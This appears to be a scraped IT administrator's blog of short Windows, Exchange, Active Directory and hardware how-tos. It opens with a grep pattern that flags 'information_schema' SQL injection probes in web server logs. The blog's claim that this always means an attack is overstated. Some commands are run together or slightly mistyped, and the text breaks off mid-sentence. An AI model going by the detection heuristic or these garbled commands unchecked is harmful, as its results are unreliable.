daknetworks.com

You are here:

Examine httpd access logs

I spend a large amount of time defending from spam attacks and sql injection attacks. I can analyze the httpd logs with the following:

grep schem ./access_log* |cut -d ' ' -f 2 |uniq -c |sort -n

• The 'grep' command searches for the word schema as in information_schema. No real sql query searches for this. It is always an sql hacking attempt.
• The files we are searching is 'access_log*' which means search through all the access logs that we have. For me, that is usually around 4 months of data. That is a fairly good data set.
• The 'cut' command chunks up the data. The '-d' part tells how to chunck the data; by a space character. The '-f 2' tells what data to collect; the second item in each line.
• The 'uniq -c' tells to count each unique item.
• The 'sort -n' sorts them least to greatest.

WSUS Setup

WSUS setup. I give credit when credit is due. This has been covered very well in the follow video:

Export Contacts from Exchange 2013

Export Contacts from mailbox in Exchange 2013

For an OU

apcupsd

apcupsd runs ups's. It's rather simple:

RUN APCUPSD

Running apcupsd isn't hard:

• -click START > PROGRAMS > APCUPSD > START-APCUPSD

This will shut your computer down when the battery is nearing end of power.

TEST BATTERY WITH APCUPSD

One of my favorite parts is that apcupsd has some options to test a battery and set some battery options. Here's how:

• -first, stop apcupsd by: click START > PROGRAMS > APCUPSD > STOP-APCUPSD
• -you may have to stop the APCUPSD service: click START > RUN > SERVICES.MSC. Find APCUPSD in the list. Click STOP.
• -cd to: C:\apcupsd\bin
• -type apcaccess.exe to see stats
• -type apctest.exe to test/configure battery

PERFORM CALIBRATION

Most of the trouble comes from performing calibration to the unit. This can be done in 2 different ways:

• -with APCTEST.
• -with a manual calibration.

A manual calibration is basically, to put at least a 30% load on the unit. Unplug the unit and let it drain to zero. Plug the unit back in.

NOTES:

-you cannot run apctest.exe with apcupsd running.
-click here for manual calibration docs as it gets into more detail than I care to display: http://www.apcupsd.com/manual/manual.html#manual-runtime-calibration

FileMaker on a cloud Virtual Machine

I've had a interest in FileMaker for decades. Nothing else seems to fit the custom software solution like FMP does.

So putting the FMP Server on a cloud VM was a information worth pursuing.

The costs from various places range like this (obscured to avoid any love letters):

 SOURCE MONTHLY-COST TOTAL COST aws 50 600 lsn 50 600 host-1 71 852 host-2 79 948 host-3 99 1188 host-4 100 1200 host-5 130 1560 host-6 130 1560 host-7 140 1680 host-8 150 1800 host-9 150 1800

As outgoing Rackspace CEO recently referenced, it is hard to beat a disrupter like AWS. You're going to have to join them.

In the end, I decided to go with LSN. They have a CloudStack running and I can rely on their support if I'm ever in a jam.

NOTES:

http://www.soliantconsulting.com/blog/2016/01/filemaker-server-on-amazon-web-services

The Quick and Dirty Windows 10 Fix

1- fix Windows Update
Use the Windows Update Troubleshooter here:
https://support.microsoft.com/en-us/help/10164/fix-windows-update-errors

2- fix Windows Image
-type: DISM.exe /Online /Cleanup-image /Restorehealth

3- fix Windows System File
-type: sfc /scannow

4- fix Windows Apps:
-type: Get-AppXPackage | Foreach {Add-AppxPackage -DisableDevelopmentMode -Register "$($_.InstallLocation)\AppXManifest.xml"}

Exchange 2013 Error: The Global Catalog Verification failed

Exchange 2013 Error: The global catalog verification failed

Working on Exchange 2013 and adding permissions to a mailbox, I get:

Active Directory operation failed on exchange.domain.tld. This error could have been caused by user input or by
information: The global catalog verification failed. The global catalog is not available or does not support the
operation. Some part of the directory is currently not available.
Active directory response: 000020E1: SvcErr: DSID-03200672, problem 5002 (UNAVAILABLE), data 0

Here's how to fix:

• -delete the files in: C:\Users\administrator\AppData\Roaming\Microsoft\MMC
• -re-run the command: Add-MailboxPermission foo.user -User foo.user2 -AccessRights FullAccess -InheritanceType All
• set-mailbox foo.user -GrantSendOnBehalfTo foo.user1,foo.user2,foo.user3

That is all.

The Trust Relationship Between This Workstation and the Primary Domain Has Failed

The Trust Relationship Between This Workstation and the Domain Has Failed

Just as a USER-ACCOUNT is an object in AD, a COMPUTER-ACCOUNT is an object in AD. This has a password but the password isn't working. Let's reset the password.

• $credential = Get-Credential (enter the domain admin account when prompted) • -type: Reset-ComputerMachinePassword -Server ClosestDomainControllerNameHere -Credential$credential

Test-ComputerSecureChannel

Now, let's test the secure channel

• -start > programs > powershell (as administrator)
• -type: Test-ComputerSecureChannel

It will come back either TRUE or FALSE. If it's false, let's try and repair it.

• -type: Test-ComputerSecureChannel -repair
• -if that didn't work, try: Test-ComputerSecureChannel -Repair -Credential

Netdom

An older way of fixing this was with NETDOM

I found out the relationship failed by:

• -right-click a folder that is a shared folder for a group on the domain.
• -click properties
• -click security tab (at the top)
• -click advanced button (at the bottom)
• -effective-access tab
• -select a user
• -click VIEW-EFFECTIVE-ACCESS

ForensiT User Profile Wizard For Entire Location

ForensiT User Profile Wizard is a great tool when you are migrating from domainold.tld to domainnew.tld.

The free version is a manual process but the corporate version is an automated process that helped migrate an entire office.

Cost

The cost is around $2 USD per computer. So for 100 computers, the cost is$200. Priced correctly on the time you will save.

Installation

A license file will be emailed to you. Save the file in the location: C:\ProgramData\ForensiT\User Profile Wizard Corporate\Deployment Files\

Run The Wizard

Running the wizard will create a CONFIG file. The config file is an xml file that is editable by any text editor. The options are pretty standard. You will be able to get through them. Very simple, nothing complex. I think the only gotchas are:

-reboot without notice (as you'll be doing this off-hours).

-create a SINGLE-DEPLOYMENT-FILE.

When finished. It will save the CONFIG file in: C:\ProgramData\ForensiT\User Profile Wizard Corporate\Deployment Files\

Edit the Config File

Edit the CONFIG file at C:\ProgramData\ForensiT\User Profile Wizard Corporate\Deployment Files\. Run the PROFWIZ.EXE again to edit the file you just created.

You need to edit a few items to get it to work the way we want it to. Namely, the following:

<! -- Corporate Edition Settings -- >
< Silent > True
< NoMigrate > False
< NoReboot > False
< MachineLookupFile >\\server\share\migrate-pc-file.csv
< Log > \\sever\share\Migrate.Log
< ScriptLocation > \\server\share\Migrate.vbs
(yes, change this even if it says not to. I find having the server share is more accomodating)

<! -- Settings for migrating all profiles -- >
< All > True

<! -- Advanced Settings -- >
< Persist > False
< NoGUI > True

< ProtocolPriority > LDAP
< DC > \ \ britannic2.britannic.domainname.tld

< ProfBatRetryLimit > 3
< ProfBatRetryDelay > 2

Most of the key/values are self explanitory. To choose which domain controller you want to join, the ProtocolPriority must be set to LDAP and the DC setting specifies the FQDN of the domain controller (make sure you precede with the "\\").

Create Migrate-PC.CSV File

A .csv file needs to be created. Column A is the current computer name. Column B is the new computer name. If the names are the same then the computer name doesn't change.

Save this file in \\server\share\migrate-pc-file.csv

Save the single-deployment-file in the same location: \\server\share

Deployment

I used 3 ways to deploy.

• -save it in:C:\ProgramData\ForensiT\User Profile Wizard Corporate\Deployment Files\
• -make sure you are still on the domainold.tld and logged in a users at domainold.tld
• -reboot all the computers for a fresh start (use PDQ inventory if you need to do this automatically).
• -click START > PROGRAM-FILES > FORENSIT > COMMAND-LINE (you do not need to run this as-admin)
• -a cmd prompt opens
• you should be at: C:\ProgramData\ForensiT\User Profile Wizard Corporate\Deployment Files\
• -type: profbat.exe
• -hit enter
• -wait... It will give some feedback but not much.
• -it will automatically go through all the computers in the .csv list, migrate all the profiles and join the new domain and reboot the computers.
• -once rebooted, everyone can use their new login at newdomain.tld
• -AWESOME!
• -the logs should be at \\server\share
• -each pc will have it's own migration log.

• -click START > PROGRAM-FILES > FORENSIT > COMMAND-LINE (you do not need to run this as-admin)
• -a cmd prompt opens
• -type: profwiz.exe /COMPUTER computer-name-here
• -hit enter
• -you will see:
>
• -wait... It won't give any verbose information.
• -soon it will go to a new line once finished and you will see:
>
>
• -the logs are the place you indicated (which should be \\server\share\).

3-manually at admin workstation after domainnew.tld

If for some reason, the pc's are joined to the domainnew.tld without the profiles being migrated, don't worry as it is pretty much the same process. The most important part is the first step:

• -make sure you are on the domainnew.tld and logged into a user with domainnew.tld
• -click START > PROGRAM-FILES > FORENSIT > COMMAND-LINE (you do not need to run this as-admin)
• -a cmd prompt opens
• -type: profwiz.exe /COMPUTER computer-name-here
• -hit enter
• -you will see:
>
• -wait... It won't give any verbose information.
• -soon it will go to a new line once finished and you will see:
>
>
• -the logs are the place you indicated (which should be \\server\share\).

4- manually at the client computer:

• -save the profwiz.exe, profwiz.config, migrate.exe, migrate.vbs at the share: \\server\share\
• -edit the profwiz.config
• -change: <GUI> True
• -save
• -run: migrate.vbs
• -it should show the progress and migrate all the profiles over.
• -reboot the computer.

5- automatically via logonscript

• -save the profwiz.exe, profwiz.config, migrate.exe, migrate.vbs at the share: \\server\share\
• -login to the client pc. It will begin the migrate process and skip if has already been run (of course it won't be referenced once the computer is joined to the new domain).

Final Thoughts

That's it! That should handle all the scenarios that will work. Of course, there are many scenarios that will NOT work. Most of the errors will be trying to move a client-pc on domainold.tld by using an admin-workstation already joined to domainnew.tld (and logged into domainnew.tld user). Or vice-versa. If you are making changes, the client-pc and the admin-pc must be on the same domain (at least for it to be easy).

In any event, in all scenarios I did not visit a single client pc. Everything worked with a little thinking. This should be built into Windows Server.

NOTES:

For the curious... Yes, it is possible to have 2 domains on the same network subnet at the same time. But there can only be one DHCP and both domains should reference the other in the DNS -> FORWARD LOOKUP ZONES. Simply add the other domain and IP address of the other domian server.

Null result from socket | Watchguard, Mimecast and Office365

Watchguard, Mimecast and Office365

Couldn't get email from certain outside domains. Further investigation revealed that this is only happening from domains hosted at Office365. The error message in Mimecast is "Null result from socket."

This means that there is no response from the internal email server when Mimecast tries to deliver the message. That means it is being blocked by the WatchGuard.

So WatchGuard is blocking anything where the header is too large.

You can see above the "Maximum email header size" is at 20,000 bytes.

We set it to: 21000.

Save > Push-Config

That did it!

NOTES:

http://www.watchguard.com/help/docs/wsm/xtm_11/en-us/content/en-us/proxies/smtp/proxy_smtp_gen_settings_c.html

Set Logon Script For Everyone in Domain With Powershell | Set Logon Script For Everyone in OU With Powershell

Set Logon Script For Everyone in Domain | Set Logon Script For Everyone in OU

Good morning class! Today, let's set the LOGON SCRIPT for everyone in a domain or in an OU:

To clear the value:

To set the value:

Or for a single user:

What About More? I Want More! Like the Home Folder?

Now I already know what you are going to ask... "Can I set the HOME FOLDER as well?"

YES!!! It's a little complicated so it is in another article here: http://www.daknetworks.com/index.php/blog/390-how-to-setup-home-drives-home-folders-and-login-scripts

How To Setup Home Drives, Home Folders and Login Scripts

How To Setup Home Drives, Home Folders and Login Scripts Automatically

Good morning class! This isn't duplicate content. This is valuable! I don't want the HOME-DRIVES part of the other article lost. So here it is:

• -setup a "users" folder on the server.
• -share the folder as: users$• -set share-permissions to: EVERYONE=FULL-ACCESS. • -set ntfs-permissions > disable-inheritance. • -set ntfs-permissions: DOMAIN-USERS (or other sub-group is large domain) > this-folder-only = Traverse | Create-Folders • -set ntfs-permissions: CREATOR OWNER > Subfolders-and-files = Full-Control • -set ntfs-permissions: SYSTEM > this-folder-Subfolders-and-files = Full-Control • -set ntfs-permissions: DOMAIN-ADMINS > this-folder-Subfolders-and-files = Full-Control • -run powershell (as admin). • -to get the values, type: get-aduser foo.user -properties homedrive, homedirectory, scriptpath • -to clear the values, type: set-aduser foo.user -clear homedrive, homedirectory, scriptpath • -to set the values, type: set-aduser foo-user -homedrive Z -homedirectory \\<server-name>\users$\foo.user -scriptpath logonscriptfilenamehere

We used to use %username% as a variable. But that doesn't work in powershell. However if you want to get same, it's a little long winded:

• -type: $username = (get-aduser foo.user -properties samaccountname |foreach {$_.samaccountname }).ToString()
• -type: set-aduser $username -homedrive Z -homedirectory \\<server-name>\users$\$username -scriptpath logonscriptfilenamehere$username should be left as is. The folder will automatically be created and named exactly as the username! Too bad it doesn't automatically create the folder permissions like the GUI does in AD.

To set the permissions:

• -type: icacls("\\<server-name>\users$\'$username'") /grant ("$username" + ':(OI)(CI)F') /T For an entire Domain or OU How about for the whole domain or for an OU. Forget the long-winded scripts you see plastered all over the internet: • -to get the values, type: get-aduser -filter * -searchbase "ou=<location>,ou=<users>,dc=<domain-name>,dc=com" -properties homedrive, homedirectory, scriptpath |ft name, homedrive, homedirectory • -to clear the values, type: get-aduser -filter * -searchbase "ou=<location>,ou=<users>,dc=<domain-name>,dc=com" |set-aduser -clear homedrive, homedirectory, scriptpath • -to set the values, type:$usernames = (get-aduser -filter * -searchbase "ou=<location>,ou=<users>,dc=<domain-name>,dc=com" -properties samaccountname |foreach { $_.samaccountname }) foreach ($username in $usernames) {set-aduser$username -homedrive Z -homedirectory \\<server-name>\users\$username -scriptpath logonscriptname} • -to set the permissions, type:$userfolder = "\\<server-name>\users$\" foreach ($username in $usernames) {icacls ("$userfolder" + "$username") /grant ("$username" + ':(OI)(CI)F') /T}

!!!Please double-check and triple-check to make sure you have the correct punctuation above. This can be a career-changing event if you get this wrong!!!

NOTES: Hopefully, it is obvious that <location>, <users>, <file-name> and <domain-name> should be replace/adjusted/deleted/added with your values.

https://windowsserveressentials.com/2012/10/29/powershell-make-it-do-something-useful/

Create Trust Between Two Domains

I was going to write an article on how to create a trust relationship between two domains but the hard work has already been done by the fabulous people over at: https://blog.thesysadmins.co.uk/admt-series-1-preparing-active-directory.html

Rename Domain

RENAME DOMAIN

-rdp into dc1.olddomain.tld
-go to dns tree.
-right-click FORWARD-LOOKUP-ZONE.
-click NEXT > NEXT > NEXT
-type in newdomain.tld
-click NEXT > NEXT > FINISH
(this is your new domain name)
-cd c:\installs
-rendom /list
-edit c:\installs\Domainlist.xml
-replace olddomain.tld with newdomain.tld
(in 4 places. The last place doesn't have a .tld)
-rendom /prepare
-rendom /execute
-reboot
-netdom computername dc1.olddomain.tld /makeprimary:dc1.newdomain.tld
-reboot
-gpfixup /olddns:olddomain.tld /newdns:newdomain.tld
-gpfixup /oldnb:olddomain /newnb:newdomain
-rendom /clean
-rendom /end
-remove olddomain.tld from dns tree.
-final reboot to make sure it survives reboot.

-go to DHCP tree.
-go to ipv4 > server-options
-change dns domain name to newdomain.tld
-restart DHCP service
-you have have to change each scope > scope-options

Client computers will need to be rebooted twice.
-once dc is rebooted, wait 15 minutes.
-reboot client computers.
-wait 15 minutes.
-reboot client computers again.

Client computers suffix should be changed automatically.

If you need a regedit to change the primary dns suffix when membership changes:
echo y | reg add   "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v SyncDomainWithMembership /t REG_DWORD /d 00000001

If you have problems with a client pc joining the new domain, you can:
-netdom remove oldpc /Domain:olddomain.tld /Force
-reboot
-join newdomain.tld

If you really, really, really need, you can use the USER-PROFILE-WIZARD at https://www.forensit.com/downloads.html

NOTES:
-these are better instructions than mine: https://mizitechinfo.wordpress.com

Hyper-V Migration

Hyper-v migration. This is an offline migration (not a live migration). Here's how:

On the older HYPER-V host:

-shutdown the VM off gracefully.

-click ACTION > EXPORT (at the top).
This will export the entire VM somewhere. This can be an external drive or a network share.

-click ACTION > IMPORT-VIRTUAL-MACHINE

-select the folder of the EXPORT (from above).

-select REGISTER THE VIRUTAL MACHINE
This will leave the VM where it is.

-select RESTORE THE VIRTUAL MACHINE.
This will place the VM where you tell it to.

Delete AD User but Mailbox Doesn't Show Disconnected

There is a link between AD and EXCHANGE. But it isn't a hard link. Meaning that just because you create an AD account doesn't mean an Exchange account will be created.

Conversely, if you delete an AD account doesn't mean that the EXCHANGE account is deleted. Rather it is DISCONNECTED. It remains this way for 30 days. Then it is deleted.

Sometimes if you delete the AD account and the EXCHANGE account doesn't show DISCONNECTED until the MAILBOX-DATABASE runs its regular maintenance.

But you can force it to run by:

• Get-MailboxDatabase | Get-MailboxStatistics | Format-List DisplayName, MailboxGuid, Database, DisconnectReason, DisconnectDate
• Update-StoreMailboxState -Database “db_name” -Identity “mailbox_guid”

This is useful if you want to import some AD users into the domain from another domain but they already have EXCHANGE accounts. You can:

• -import the other AD accounts.
• -show the mailboxes as disconnected.
• -reconnect the mailboxes to the other AD accounts.

Avago 3108 | LSI | MegaRaid | Broadcom | Supermicro

MegaRaid controllers can be confusing and difficult because of the companies that keep on merging together. Currently, Broadcom maintains LSI equipment. But, in my opinion, they are being difficult recently and forcing you to get support through the OEM's. OEM's like Supermicro don't have much information either.

In any event, you can control the MegaRaid cards either:

-upon boot up with a CTRL+H

-or through the MegaRaid Management Software

Again, I would list more but this web site has more information than we can provide:

Upon installation, the login is the login of the computer you are using.

You can now manage your raid.

VHDX to Physical Disk

I created a VHDX from a physical disk using a program called Disk2vhd.

Now I want to copy that VHDX back to a physical disk.

• -boot from E2B USB disk
• -select: systemrescuecd

Get your bearing by seeing what is recognized:

• fdisk |grep "/dev/"

To connect the VHDX and clone to the physical drive:

• -type: qemu-nbd --connect=/dev/nbd0 --format=VHDX <vhdx_file_name>
• -type: ddrescue --verbose --force /dev/nbd0 /dev/sda

To disconnect the VHDX:

• -type: unmount /mnt
• -type: qemu-nbd --disconnect /dev/nbd2

Migrating Active Directory Users and Merging Domains

Migrating Active Directory Users and Merging Domains

Imagine you are part of a company. That company is being bought out by a larger company. To ease feelings, new email accounts are created at the larger company (ie This e-mail address is being protected from spambots. You need JavaScript enabled to view it ). The computers remain on the domain of the smaller company (ie @branch.tld).

Now comes a point in time where the larger company wants to join the domains together. What are the options? How do you handle this situation?

Very good questions.

OPTION-1: 1 Forest & 2 Domains

A forest is a group of domains. It is possible to keep the domains separate but still have the same forest. @hq.tld and @branch.tld will live happily together and have a trust-relationship.

Two users would still exist. For example, This e-mail address is being protected from spambots. You need JavaScript enabled to view it and This e-mail address is being protected from spambots. You need JavaScript enabled to view it would still exist which is confusing for people.

OPTION-2: Parent-Child Domain

The parent domain is hq.tld. It is possible to have a child domain such as branch.hq.com (or is you prefer, us.company.tld).

Two users would still exist. For example, This e-mail address is being protected from spambots. You need JavaScript enabled to view it and This e-mail address is being protected from spambots. You need JavaScript enabled to view it would still exist which is confusing for people.

OPTION-3: Flat & Import

This consolidates everything down. It gets rid of messiness and flattens the company to 1 domain of hq.tld.

Only one user exist per person and this makes sense for people.

How To Flatten Domain and Import Users

Outlook 2016 Autocomplete (nk2)

When you start an email and you start to type in an email address, OUTLOOK will show a drop-down list of email addresses you've written to before.

This is an AUTOCOMPLETE-list (This is not an address-book or contact-list). What's surprising to me is that, to users, this list is more important than the contact-list or address-book. Probably because it automatically show.

What's more suprising is that there is no connection between the contact-list, address-book or AUTOCOMPLETE-list.

History Autocomplete

The AUTOCOMPLETE file used to be called the NK2 file. There is a ton of information about the NK2 file.But it's 2017 and closing to 2018, the NK2 file is no longer relevant. The data on the internet is becoming long in the tooth. So much bad information.

Location Autocomplete

In any event, the AUTOCOMPLETE list in OUTLOOK 2016 is here:

C:\Users\foo.user\AppData\Local\Microsoft\outlook\RoamCache\

The file name is something like:

Stream_Autocomplete_0_A603AC42FB764D4C9662D971D85637C2.dat

!!!Step 1 For Autocomplete!!!

Before you do anything, copy this file as a backup!!! The file size is small and can be copied in less than 5 seconds. This file is known to be volitile and can go from a large size down to zero without warning. This is why you want a backup.

Transfer Autocomplete

If you have an old computer and OUTLOOK setup and your new comuter and OUTLOOK setup doesn't have the list, you can:

• -close OUTLOOK.
• -copy this file to the new computer.
• -place in the following directory: C:\Users\foo.user\AppData\Local\Microsoft\outlook\RoamCache\
• -rename the current DAT file to something like: Stream_Autocomplete_0_A603AC42FB764D4C9662D971D85637C2.dat.old
• -change the wanted DAT file (with all the info in it) name to the current name, something like: Stream_Autocomplete_0_A603AC42FB764D4C9662D971D812345.dat

Export Autocomplete

You can export the names in the DAT file. Despite the name, the NK2EDIT is the best tool for this:

This will save the file as an NK2 file that can later be imported somewhere else.

Import Autocomplete

This is for a fresh OUTLOOK with no AUTOCOMPLETE.

• -open the NK2 from the old system.
• -click FILE > EXPORT-TO-MESSAGE-STORE

This will overwrite the existing AUTOCOMPLETE with the items from the old AUTOCOMPLETE.

Merge Autocomplete

This is to merge old AUTOCOMPLETE with the current AUTOCOMPLETE.

• -open the NK2 from the old system.
• -click FILE > IMPORT-FROM-MESSAGE-STORE
• (This will merge the current AUTOCOMPLETE with the info from the older AUTOCOMPLETE.)
• -click FILE > EXPORT-TO-MESSAGE-STORE

This will overwrite the existing AUTOCOMPLETE with the items from the old AUTOCOMPLETE.

Rebuild Autocomplete

Let's say that the AUTOCOMPLETE file is gone. For whatever reason, it is emtpy (I'm bashfully looking away, avoiding eye contact). But you still have your PST/OST file. Can't you just rebuild the AUTOCOMPLETE with information that is in the SENT-ITEMS folder?

Yes, you can. Here's how:

•  -open NK2EDIT (the list will be empty).

This will allow you to rebuild the AUTOCOMPLETE with items from your SENT-ITEMS folder. This is probably what you want; as everyone you've written an email to will automatically be placed in here. In addition, you can place a checkmark to items from your INBOX as well.

Fiddle around with the settings and when you are satisfied, click FILE > EXPORT-TO-MESSAGE-STORE.

Edit the AUTOCOMPLETE

• -open NK2EDIT and edit away.
• -be sure to FILE > EXPORT-TO-MESSAGE-STORE.

Final Thoughts

In short, this is an oldy but goody. Considering the importance of AUTOCOMPLETE items to users, you wonder why this isn't built directly into the OUTLOOK.

NOTES

There is a POWERSHELL script that didn't exactly work for me but it looks promising if could be updated:

Outlook 2016 Won't Open - Crashes Upon Starting Outlook 21016

Outlook 2016 Won't Open - Crashes Upon Starting Outlook 21016. Here's how I fixed it:

Office365 Repair

• -close OUTLOOK
• -click START > CONTROL-PANEL > PROGRAMS-AND-FEATURES
• -click MICROSOFT-OFFICE-365
• -click CHANGE (at the top).
• -click FULL-REPAIR (not "quick-repair")
• -wait 15 minutes.
• -try OUTLOOK again when finished.

x64 Bit

If that doesn't work, I've found the x64 bit to be more stable:

• -uninstall Microsoft Office x32
• -restart computer.
• -install Microsoft Office x64

Outlook Safe Mode

If that doesn't work:

• -hold CONTROL
• -click OUTLOOK icon to open.
• -click YES (for disable plugins)
• -uncheck everything.
• -click OK
• -close OUTLOOK
• -open OUTLOOK in normal mode.

Set Data File

If that doesn't work:

• -click START > SETTINGS > CONTROL-PANEL > MAIL
• -click EMAIL-ACCOUNTS
• -click DATA-FILES (at the top)
• -select your mail account in the list.
• -click SET-AS-DEFAULT
• (yes, even if it already is).
• -click CLOSE > CLOSE.
• -open OUTLOOK.

Update iCloud

If that doesn't work:

Office365 Account Conflict

If that doesn't work, you might have an OFFICE365 account conflict. You may have one OFFICE365 account for WORD, EXCEL, OUTLOOK and another OFFICE365 account for EMAIL.

• -click START > SETTINGS > ACCOUNT
• -click EMAIL-&-APP-ACCOUNTS (on the left-hand side).
• -remove the OFFICE365 account that is only for email (leaving the OFFICE365 account that is for WORD, EXCEL, etc or the one that you use to login to the computer [ie same as your username]).
• -make sure the correct DATA-FILE is set as the DEFAULT (see above).
• -open OUTLOOK

Office Update

If that doesn't work:

• -click START > SETTINGS
• -click UPDATE-&-SECURITY
• -install any updates and restart the computer.

Redo

If that doesn't work, you've probably spent too much time on this:

• -start a new profile.
• -add the email accounts back in.

Microsoft Edge Pop Up Blocker Exceptions

Microsoft Edge Pop Up Blocker Exceptions

As of this writing, there is not pop up blocker exception setting in Microsoft Edge. There is only an ON/OFF option.

However, you can still adjust this manually through the registry or regedit. You can manually edit here:

[HKCU\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\Allow]

Pop Up Blocker Exceptions Allow

Or you can follow the instructions below:

• -click start > run
• -type: cmd
• -type: echo y | reg add "HKCU\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\Allow" /v "url-name-here" /t REG_BINARY /d 00000000

(NOTE: keep the quotes in-tact. Use *.domain.tld for wildcard.)

Pop Up Blocker Exceptions Allow In Private

Also note that PrivateWindows mode has separate values located here (which doesn't mean they are all that private):

• -click start > run
• -type: cmd
• -type: echo y | reg add "HKCU\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate" /v "url-name-here" /t REG_BINARY /d 00000000

(NOTE: keep the quotes in-tact. Use *.domain.tld for wildcard.)

Exchange 2013 - Get the Number of Emails in a Folder

Exchange 2013 - Get the Number of Emails in a Folder

Here's how:

Get-MailboxFolderStatistics foo.user |Select Name, ItemsInFolder

It will show the folder structure and the number of items in each folder.

Exchange could not load the certificate with thumbprint

Exchange could not load the certificate with thumbprint. Or as the warning message states in the logs:

Microsoft Exchange could not load the certificate with thumbprint of 59235427B7C322A8CFD7E1EB939445A2EAF9F670 from the personal store on the local computer.

Get the information

There's a few ways to get the information to see the current certificate list.

First is through the Exchange Management Shell (EMS):

• -type: get-exchangecertificate

You can see the same list in the Exchange Admin Center (EAC):

• EAC > servers > certificates

You can also see the same list in Internet Information Services (IIS):

• -click server-name (on the left-hand side).
• -click SERVER-CERTIFICATES (on the middle section).

Once you have the information displayed, find the thumbprint of the certificate you are using for email.

Fix the error

In EMS:

• -type: Enable-ExchangeCertificate -Thumbprint <new_certificate_thumbprint> -Services None
• -type: Enable-ExchangeCertificate -Thumbprint <new_certificate_thumbprint> -Services IMAP,POP,IIS,SMTP

Explanation

This error is actually coming from the configuration of the: get-transportservice

More specifically, the value at: get-transportservice |select InternalTransportCertificateThumbprint

In older versions this is called: get-transportserver

More specifically, the value at: get-transportserver |select InternalTransportCertificateThumbprint

With this command you will see the thumbprint of the certificate in the log.

Typing the commands above will replace this value with the new value.

For the curious, there is no fine-tuned fix. In other words, the following does not exist or work. Use the above commands:

set-transportservice InternalTransportCertificateThumbprint <new-certificate-thumbprint-here>

Find All Distribution Groups A User Is A Member Of

Find All Distribution Groups A User Is A Member Of. I hope that makes sense. Let's say you have a user name: foo.user. What groups is foo.user a member of?

Here's how:

Get-DistributionGroup -Filter "Members -like 'CN=foo user,OU=where-ever,OU=Users,DC=domain-name-here,DC=tld'"

Since the DistinguishedName is used, it makes it nearly impossible to use the command unless you keep it in a handy note somewhere. Instead, this may be easier:

-type: $distinguishedName = (Get-Mailbox -Identity foo.user).distinguishedname -type:$group = Get-DistributionGroup -Filter "Members -like '$($distinguishedName)'"
-type: Write-Host $group Adobe Lightroom High CPU on Mac OSX Another article on the internet about Adobe Lightroom with high cpu on Mac OSX because, well, it's a problem (and Apple doesn't care). • -close Lightroom app. • -delete: /Users/<username>/Library/Preferences/com.adobe.Lightroom6.plist • -delete: /Users/<username>/Library/Preferences/com.adobe.Lightroom6.LSSharedFileList.plist • -delete anything else that looks like it belongs to Lightroom in: /Users/<username>/Library/Preferences/ • -delete anything that looks like it belongs to Lightroom in: /Users/<username>/Library/Preferences/Adobe/ • -delete anything that looks like it belongs to Lightroom in: /Users/<username>/Library/Application Support/Adobe/ • -delete anything that looks like it belongs to Lightroom in: /Users/<username>/Library/Caches/Adobe/ • -open LIGHTROOM • -click LIGHTROOM > PREFERENCES > GENERAL. • -uncheck "Select the current/previous import collection during import." • -click PERFORMANCE (at the top). • -uncheck "Use Graphics Processor." • -make sure the import folder that it is trying to import from exists. In other words, sometimes the last import location is a external drive that doesn't exist anymore. Change it to somewhere neutral like the DESKTOP. Windows 10 Lock Icons Windows 10 Lock Icons. Here's how: • -click here to download the program: http://www.donationcoder.com/Software/Skrommel/index.html#DeskLock • -move the program to: C:\Program Files (x86)\DeskLock • -right-click DeskLock.exe • -click CREATE-SHORTCUT • -move the shortcut to: C:\Users\$username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
(where $username is your-username that you use to login to your computer) • -arrange the icons the way you want. • -reboot the computer. Having various clients, it's always interesting to see different perspectives. There is a class of client that approaches computers differently than I do. One question this class asks is, "How do I lock my icons on my DESKTOP?" The thinking is that the DESKTOP is the User Interface (UI). This UI should not be changed unless given specific permission and instructions to do so. Changing it without permission or instruction is nearly a violation of human rights. With as much attention that UI gets (and rightly so), one would think that the DESKTOP arrangement is utmost important rather than being flippantly changed every time a feature update comes along. One Operating System that I know of (Ubuntu) went so far as to lock the UI so that the TASKBAR and START-BUTTON are locked on the left hand side of the screen. And, of course, Mac OSX has always had the TASKBAR and APPLE menu at the top. A person unfamiliar or afraid of computers will not want anything changed. And as we get older, we have the tendency to want everything to stay the same. Don't have 2 buttons if you can have one. Even Mac mouses have only 1 button until told otherwise. Referring to Windows 10 annoying habit of re-arranging icons, as one client put it, "It's like someone coming into your home and rearranging your furniture without asking." I don't disagree. Mimecast Undeliverable - Unknown Address Error Problem Mimecast Undeliverable - Unknown Address Error. You get the message: ===== The following message to < This e-mail address is being protected from spambots. You need JavaScript enabled to view it > was undeliverable. The reason for the problem: 5.1.0 - Unknown address error 550-'Invalid Recipient - https://community.mimecast.com/docs/DOC-1369#550' ===== Further more, looking at the TRACKING diagnostics, you see the "Rejection Information" states, "Failed Known address verification." The issue is that the email address does exist in Exchange. What gives? Solution Well Mimecast has a few settings to receive email. This setting is on the domain/internal-directory level (administration > directories >internal-directories). There are a few options. One is "Accept emails for known recipients only." Accordingly, each user that you want to receive email for must be added to Mimecast. The first time a user sends an email outbound via Mimecast a user will be created. Since groups don't send email (typically), a Mimecast account is never added. So it's possible that there could be an email address in EXCHANGE that is not in Mimecast. Fortunately, users can also be added to Mimecast through: • import (ie import a list) • manually • AD sync If there are not a bunch of groups, it's probably easiest to just add the group email addresses manually. Generating Barcodes - Code 39 and Code 128 Generating barcodes is somewhat easy but can get complicated for various reasons. Before we get to it, know that there are several types of barcode formats. We're focusing on linear barcodes, CODE 39 and CODE 128. Code 39 (or Code 3 of 9) Code 39 is simple. In short, surround the text with asterisks and change the font to 3-OF-9. • -install the Code39 font here: http://www.fonts2u.com/3-of-9-barcode.font ([c] CAIL v1.0 - 1993) • -install the font. • -reboot the computer (this is required). • -in WORD: • type what you want in a barcode (ie ABC123). • surround it with asterisks (ie *ABC123*). • change the font to 3-OF-9. • that should do it! • -in EXCEL • type what you want in a barcode in column A: (ie ABC123) • create a simple formula (use the CONCAT function) in column B that surrounds the text with asterisks: (ie *ABC123*) • create a simple formula in column C that simply mirrors column B. • change the font on column C 